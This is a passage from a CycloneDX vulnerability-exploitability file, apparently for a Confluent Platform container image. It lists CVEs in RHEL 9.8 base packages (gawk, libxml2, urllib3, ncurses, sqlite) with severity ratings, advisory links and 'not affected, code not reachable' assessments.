          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45322",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is \"I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45322"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/10/06/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45322"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/344"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/583"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45322"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
        }
      ],
      "published": "2023-10-06T22:15:11+00:00",
      "updated": "2026-06-17T06:28:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45803",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45803"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2988"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45803"
        },
        {
          "url": "https://bugzilla.redhat.com/2246840"
        },
        {
          "url": "https://bugzilla.redhat.com/2257028"
        },
        {
          "url": "https://bugzilla.redhat.com/2257854"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1983596"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1989575"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132867"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132868"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132872"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2228743"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237773"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237778"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2244340"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246840"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253330"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254210"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262272"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25091"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34558"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2879"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2880"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41715"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29409"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39318"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39319"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39321"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39322"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39326"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45287"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45803"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23650"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2132.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:2988"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-45803.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2988.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7762-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
        },
        {
          "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
        }
      ],
      "published": "2023-10-17T20:15:10+00:00",
      "updated": "2026-06-17T06:29:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-50495",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-50495"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-50495"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00029.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240119-0008/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6684-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
        }
      ],
      "published": "2023-12-12T15:15:07+00:00",
      "updated": "2026-06-17T06:39:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "6.2-12.20210508.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "6.2-12.20210508.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-0232",
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0232"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0232"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243754"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0232"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240315-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0232"
        }
      ],
      "published": "2024-01-16T14:15:48+00:00",
      "updated": "2026-06-17T06:53:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.34.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
